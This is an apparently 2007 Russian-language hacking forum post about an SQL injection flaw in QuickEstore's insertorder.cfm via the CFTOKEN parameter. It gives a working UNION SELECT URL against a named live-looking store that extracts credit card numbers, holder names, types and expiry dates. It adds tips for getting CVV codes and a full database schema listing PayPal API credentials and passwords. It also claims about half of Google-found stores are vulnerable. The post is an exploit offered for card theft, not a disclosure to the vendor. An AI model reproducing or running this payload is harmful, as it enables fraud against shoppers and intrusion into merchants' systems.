19.07.2007, 18:15
|
|
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
С нами:
10188506
Репутация:
861
|
|
SQL-inj в QuickEstore
Существует возможность провести sql-инъекцию из-за недостаточной обработки входных данных в параметре CFTOKEN в скрипте insertorder.cfm.
Пример:
http://www.appointmentsatfive.com/insertorder.cfm?CFID=6060&CFTOKEN=88477579+union+s elect+1,2,3,ccnum,ccname,6,7,8,9,10,11,12,13,cctyp e,ccexpires,16,17,18,19+from+customers/*
Кол-во полей везде разное, но в основном от 15 до 19.
Есть и cvv, но он в таблице PARAMS и есть почему-то не везде, но можно вывести его и через последние заказы.
Вот всё остальное (после TABLE таблица, ниже колонки в ней):
TABLE [Attributes]
[AttributeNum]
[Attribute]
[AttValues]
TABLE [Categories]
[CategoryID]
[Category]
[CatPic]
TABLE [Customers]
[CustID]
[CustFName]
[CustLName]
[CustPhone]
[CustEMail]
[CustAddress1]
[CustAddress2]
[CustCity]
[CustState]
[CustZip]
[CustCountry]
[LastOrderID]
[LastOrderDate]
[LastOrderAmt]
[CCName]
[CCType]
[CCNum]
[CCExpires]
[CustPWord]
TABLE [OrderHist]
[OrderNum]
[CustID]
[ItemID]
[SKU]
[Quantity]
[ItemTotal]
[TotItemWeight]
[Att1]
[Att2]
[Status]
TABLE [Orders]
[OrderID]
[ItemID]
[Quantity]
[ItemTotal]
[TotItemWeight]
[Expires]
[Att1]
[Att2]
TABLE [OrdHistDetail]
[OrderNum]
[CustID]
[GrandTotal]
[Shipping]
[SalesTax]
[OrderDate]
[CustEMail]
[Notes]
[ShipDate]
[ShipMethod]
[ShipName]
[ShipAddress]
[ShipCity]
[ShipState]
[ShipZip]
[upsize_ts]
[AddressStatus]
TABLE [Params]
[storename]
[template]
[password]
[processor]
[partner]
[vendor]
[loginid]
[paypassword]
[certpath]
[type]
[ccards]
[testmode]
[inv_description]
[store_path]
[store_url]
[secure_url]
[order_path]
[order_url]
[orderaction]
[notifyemail]
[db]
[graphic]
[shipmethod]
[selfservice]
[offerpaypal]
[paypalonly]
[ppec]
[cffileenabled]
[csistorename]
[storefax]
[storeaddy]
[storecity]
[storestate]
[storezip]
[avs]
[cvv]
[PPEC_API_UserName]
[PPEC_API_Password]
[PPEC_API_Signature]
TABLE [ProdPics]
[ItemID]
[ItemPic]
[Thumbnail]
TABLE [Products]
[ItemID]
[SKU]
[ItemName]
[CategoryID]
[SubCatID]
[Description]
[Price]
[MSRP]
[DiscAmt]
[DiscIsPct]
[DiscTrigger]
[Weight]
[A1]
[A1Vals]
[A2]
[A2Vals]
[Units]
[Layout]
[Qty_In_Stock]
[Safety_Stock]
[Taxable]
[Shipable]
[Show_Inventory]
[New] [bit]
TABLE [SalesTax]
[State]
[Rate]
TABLE [ShipOptions]
[OptID]
[Option_]
[OptRate]
TABLE [Shipping]
[shiplimit]
[shipfee]
TABLE [SubCats]
[SubCatID]
[SubCat]
[TopCatID]
TABLE [States]
[State]
[Abbreviation]
TABLE [Categories]
[PK_Categories]
[CategoryID]
TABLE [Customers]
[PK_Customers]
[CustID]
TABLE [ProdPics]
[PK_ProdPics]
[ItemID]
TABLE [Products]
[DF_Products_Taxable]
[Taxable]
[DF_Products_Shipable]
[Shipable],
[PK_Products]
[ItemID]
На счет версии не знаю, но в гугле на запрос
каждая вторая уязвима.
P.S.: Вроде ничё не забыл 
Последний раз редактировалось n0ne; 19.07.2007 в 18:29..
|
|
|